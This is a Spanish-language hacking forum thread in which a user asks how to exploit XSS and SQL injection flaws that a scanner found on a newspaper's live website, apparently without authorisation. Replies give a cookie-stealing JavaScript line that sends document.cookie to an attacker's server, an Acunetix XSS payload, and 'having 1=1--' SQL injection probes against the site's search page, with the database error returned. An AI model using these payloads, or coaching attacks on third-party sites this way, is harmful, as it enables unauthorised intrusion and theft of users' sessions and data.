 Autor
|
Tema: xss encontrado en web(como sacar provecho?) (Leído 7,457 veces)
|
Tengu
 Desconectado
Mensajes: 330
2+1 = 1 , despues de todo , tdo es relativo
|
hola eh encontrado la siguiente falla en una web y tal vez esta web sirva como ejemplo para poder explicar la explotacion de un bug de alta importancia,para asi poder aprender de forma practica, asi q espero coolaboracion para que los q realmente saben y si no les molesta instruyan de su conocimiento a un monton de newbies igualmente desde ya se agredece su colaboracion.
bug:con acunetix aparece el mensaje de 11 xss en el index.php
Attack details
The GET variable nuevo_ano has been set to >"><ScRiPt%20%0a%0d>alert(1981921819)%3B</ScRiPt>.
espero su ayuda y conocimiento para liberar la informacion jej salu25
|
|
|
|
|
En línea
|
Encuentros por Video y Chat !! |
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
Pues ahí te dice donde esta la vuln [...] Busca mas abajo del foro (creo que en documentacion) sobre 'los poderes secretos de XSS' escrito por SDC y las dudas que tengas ya se vera la respuesta  |
|
|
|
|
En línea
|
|
|
|
wizache
Desconectado
Mensajes: 143
El que poco sabe poco vive
|
Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link
Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
si fuese un foro, un banco o un lugar donde esten registrados users, seria interesante explotar el XSS, aunque hay otras tecnicas interesantes como el documento que saco sdc para explotar dichos bugs.
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 330
2+1 = 1 , despues de todo , tdo es relativo
|
gracias por interesarse en ayudarme, ya estuve siguiendo los consejos y me adentre en el tema, el bug pertenece al servidor de un diario corriendo un Microsoft-iis/5.0 el cual posee unas 26 vulnerabilidades de xss y 5 de sql injection. Lo que estudie a fondo fue el tema del xss pero logre descubrir que se trata de un xss ocal,es decir que el script no llega al servidor sino que solo se injecta codigo en el navegador lo que seria util pero solo si se mandara el link maliciosamente modificado a un usuario para ejecutar codigo. pero como dije antes ,no es posible una injeccion del tipo 2 en el formulario del servidor. Tembien tiene WebDav activado, y la vulnerabilidad en sql afecta a http://www.vulnerable.com:80/search.asp?bqd=111-222-1933email@address.com&oper=' uds. diganme que les parece. salud25 y otra vez GRacias |
|
|
|
|
En línea
|
Encuentros por Video y Chat !! |
|
|
wizache
Desconectado
Mensajes: 143
El que poco sabe poco vive
|
Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes
SAludos
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 330
2+1 = 1 , despues de todo , tdo es relativo
|
la respuesta q devuelve es
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
El controlador ODBC no admite las propiedades solicitadas.
/search.asp, line 106
|
|
|
|
|
En línea
|
Encuentros por Video y Chat !! |
|
|
wizache
Desconectado
Mensajes: 143
El que poco sabe poco vive
|
mm. ese error es nuevo para mi, siempre te regresa el error?, o en que casos, otra pregunta, el tipo de valor que toma "oper" por defecto cual es? una cadena o un entero
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 330
2+1 = 1 , despues de todo , tdo es relativo
|
si9 alguien logra saber a que se debe este error porfavor haganmelo saber jej
|
|
|
|
|
En línea
|
Encuentros por Video y Chat !! |
|
|
yeikos
Desconectado
Mensajes: 1.424
|
la respuesta q devuelve es
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
El controlador ODBC no admite las propiedades solicitadas.
/search.asp, line 106
Ese error se debe a que la sintaxis de la consulta es incorrecta, prueba a reconstruirla de nuevo siguiendo los consejos que te dió wizache.
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
El Estado islámico lanza una campaña en las redes para sacar provecho de la ...
Noticias
|
wolfbcn
|
0
|
1,434
|
14 Enero 2015, 21:08 pm
por wolfbcn
|
|
|
|
¿Se le puede sacar provecho a este ordenador con alguna distro linux?
GNU/Linux
|
AtariRulz
|
6
|
3,851
|
29 Diciembre 2015, 03:17 am
por crack81
|
|
|
|
Encontrado bug en linux, como proceder?
GNU/Linux
|
Hason
|
0
|
1,859
|
6 Septiembre 2016, 14:31 pm
por Hason
|
|
|
|
Cómo sacar provecho de lo aprendido
Dudas Generales
|
Ancasu
|
5
|
4,281
|
10 Diciembre 2016, 04:28 am
por PalitroqueZ
|
|
|
|
¿Que provecho se le puede sacar a una Botnet?
Análisis y Diseño de Malware
|
tutululu
|
6
|
3,584
|
22 Noviembre 2018, 00:38 am
por AlbertoBSD
|
 |
